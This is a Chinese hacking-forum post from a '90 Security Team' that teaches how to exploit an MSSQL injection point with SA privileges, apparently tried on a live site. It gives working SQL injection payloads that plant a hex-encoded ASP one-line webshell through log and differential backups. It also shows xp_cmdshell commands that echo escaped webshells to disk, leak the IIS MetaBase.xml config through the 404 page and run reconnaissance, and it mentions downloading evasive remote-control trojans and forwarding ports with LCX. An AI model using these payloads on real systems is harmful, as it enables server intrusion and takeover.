找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2134|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————( E# h" @: J: `/ H+ V) z

* r/ A3 U5 K2 A$ V$ X( J9 O' v! K" \0 T
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
; y' L; R  A- }7 x
5 P6 B) f) v! Y$ I/ A                                                                 
9 m. |% _2 v8 x/ Q5 J                                                                 1 L) o) |: ~: ?
                                                                  论坛: http://www.90team.net/. }7 D+ l' H8 J# x) f1 z+ E5 u

, y) j. f2 m$ n- e0 Y  C
5 w4 ^% c5 ^  P. n0 n8 P  ?$ @+ o% K. y8 ?9 J2 t8 t
友情检测国家人才网
/ m3 h1 s' q3 r; W7 V9 u# m
7 E% j3 o% m; y  v; E: m! q& |+ s8 q) r9 r6 |, i
内容:MSSQL注入SA权限不显错模式下的入侵" y) G4 k% [6 _: X7 S7 E
/ q, o  q+ k$ b8 z' @4 w  P
5 a; [1 _+ d+ t, ~5 e% ~7 D
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。- }9 y9 q5 J6 }% k
+ D% z' f1 o! o5 R- c2 c! F5 |) q- R
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
- Q& U! P" z. _! N( j* T& [- Y4 t6 H& J* T

% W/ z" @* i8 ]/ g这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
, x% F/ S$ m, N7 }
2 v( t( \) J1 d思路:
( d4 a) D' W  p* l3 c* @8 Z. j
+ t& ]- m+ Y+ H, U首先:9 f" u9 \. c1 z6 I2 q0 _* t3 `

. m) F1 ~' Q: d( f4 ]% a1 [& s2 r通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。; l+ q* p# T( q* T3 ?
0 ~0 p7 U4 t+ D+ d
1.日志备份获得Webshell
! {1 T! H4 \! G2 |
: i+ J) ]( [. g& _! b2.数据库差异备份获得Webshell7 e  U+ J9 a  O# G1 w
+ m" l, @) `9 V0 H' t. K5 I
4.直接下载免杀远控木马。# R/ ~5 f; Z" ?1 C# d, F

: f6 \- H# G, R; E4 [  n/ C5.直接下载LCX将服务器端口转发出来
# u& p( u' M/ T+ N: {
  j4 q% N  k1 M' A2 I) F- z6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。* i0 F! e! c1 I& E* C" v
# z9 {* H3 w" W, U
0 y0 R2 G) b( o* S; _0 A. M: z
  l) x1 c+ }$ }1 a5 }3 A
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, / U; H7 R" `; _' @* g
6 G4 L0 G6 t& P! _
我直接演示后面一个方法! G2 T3 N# j, l& Y; U

/ ^! w0 i* {1 n- T1 }0 q# A/ j/ D# M2 C
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
8 p6 @2 f9 G* t% I: [) o9 _! `( t# ]
! q$ {7 i1 j) \2 V7 A% p5 t
$ S* z% K' M1 t+ S0 ~/ B0 N

; E2 o8 a% i8 v  A: E◆日志备份:, ~5 R8 ?( v' k1 ^% c
3 @9 t( t" u: e; G
7 p  E) }' U3 G0 w6 w( U
1. 进行初始备份4 T) O1 [" N% a! v$ I8 d# ~
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--% C# ^3 D9 {9 U7 _

, c4 K2 @! q3 X* h2. 插入数据
! z, k3 d7 W& z( N! f;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
8 V0 a6 x* V4 i( q& Z" }$ y( H) E$ _/ u7 D, \
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
! E: K/ `" i; d; N; R# Z  & P1 S4 t" r! }) T0 \
3. 备份并获得文件,删除临时表1 t5 u" Q# a4 _% F- H" w8 _
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
* `9 F; W* }1 A- G0 L9 T2 s) M+ ^7 h! b5 {3 P& v! ^* P! b
; `) ?, d# ~, k: O; ^7 n
& z  n% ?9 R4 S7 v: ~5 c
◆数据库差异备份
3 U2 D8 k( |) w, [' \9 W. I) b4 W. `- }" ~
(1. 进行差异备份准备工作) Y: |7 R; N5 [( y2 {3 W" j6 l

$ O# R9 [. l  i8 V;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
2 G: U6 H9 \! g" r5 Y2 B% Z7 u
  v8 H6 r$ ?( @' j8 Y上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
: Z5 e6 H5 ?9 Q  J , s0 @3 R, b' Y0 ~( ]' U% x
: f4 D$ U* R# n/ ]$ l
(2. 将数据写入到数据库! z/ Y# W7 i- y4 C, g
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- 2 M; s0 h; x  [. }7 W/ V; X1 m

7 u+ \: E! P( X9 J! T# K5 P0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
! h0 X0 r9 }8 s5 w( \
  x, M: }/ u/ F8 N; n3. 备份数据库并清理临时文件
( j% _6 ~9 k+ o6 j* G' n
# F/ N0 ]5 Q" v; r;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--, G8 b# f4 w. r) W9 C6 N+ a
! n1 D$ s, L( y0 X* M
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
# W4 J# k+ `+ R1 y" L! B
$ o9 }7 }0 m6 G- o' E) B9 ~( u/ K( X! K! p6 Z

% u6 c" @! s1 A/ [8 ^' L" }9 d用^转义字符来写ASP(一句话木马)文件的方法:   ) z0 L8 U) S" p* Z
; S( T) m% d0 {( X* c) H1 a
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--/ N- Y# \3 b4 B1 ^& E0 y+ Z$ A

$ {: a3 `8 E) d) Y2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp . u/ O3 M: Q$ ^; `

) n+ C0 k' M- l& I% M读取IIS配置信息获取web路径
6 Q8 j6 Z0 u8 H$ b$ H- E/ X' \9 l9 `  z4 T
       D- i  z+ ~0 f  u
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--  g$ q# q* i, v6 @
( r: d  I9 m8 `1 O2 a1 X+ C* S
执行命令
! P+ m: j$ l6 f! [; _' J     
% L2 T6 Q/ M3 F; r     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
$ b7 f5 h, c. e2 K; R" ]
" k" I2 V' B8 `0 V( r% t8 ?  j9 ?- Z( h. o9 `- `6 `# d" X# ~; s
, `5 l  A% |* c# W+ h7 \
8 p+ ^" g1 M; j, t  C

! B  M; d1 ]9 q) e4 `+ K: P
; i6 e, i0 M' D, ?5 t
3 h+ G) R% }2 u) ]3 A! }0 a1 ?: M) @% T0 A% J& e- Y3 P/ ]  P

  E% ]* F/ M6 z" m* x1 n3 {9 Y4 d2 @1 S# I8 t
1 X6 y4 i" |- ]7 g5 R( V9 Y
3 B. [7 e; a4 y, N) r
4 Z. ^3 D/ f; C# j0 ^) `7 u

' @. ]) @( Y4 o! g( |' C5 [  V( z' K9 }- r; @8 @; a

* W4 B( n7 T- v/ x% x2 E( }# u
. h8 n3 ^! E+ L) W8 w* f( f" s% D6 m. E
2 l& X/ }9 [* p4 R

8 o, X2 M9 b$ e& H# B, a' Y
* u2 Y" u' G( I* |) x, o
: ]* ]7 a0 z4 b/ U' s/ }7 D: _0 z& j; I# q# h- {  K; ~  v9 h' v) O2 i

' d( Y7 e5 \( ~9 [/ C2 z
! r: l0 m9 R) n- O  n. J# t! Z8 x4 F/ p+ V: |* H

9 S$ E, ^, |+ k, c0 {- T
$ l) J# }- Z2 X7 n+ j0 B$ G. c7 ]% t4 |; Z: G
9 o8 ^% _. i0 R8 n* d9 h3 w

) m# C% B8 E- ?3 X  D. w& Q7 l; D: U
" j+ X! D# b0 T" Y  D

5 h+ f+ B( @, t' m
2 A7 Q/ p5 h/ j
1 F+ c$ I' Q3 g: n: P% `& k9 h/ @5 R, n
: S0 M- K/ t0 Q5 l" {
+ }  J* ?/ }! V& y" _( G

- F5 z( d# O! i2 ~! k" A- l9 f" @: U+ a8 k6 V

/ L4 G/ s; w; n1 S/ D5 D& z0 [5 @9 _
- s" g8 z  C& g7 [9 X; G. k: U" _9 V( G4 v  F
) }4 m  \; V' z7 ^/ }1 {' X* K

" d& ~" S$ I: z& z6 C6 b, h' x$ U- i6 \# j; t  e$ S
- m/ [) c# K% _. m5 q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表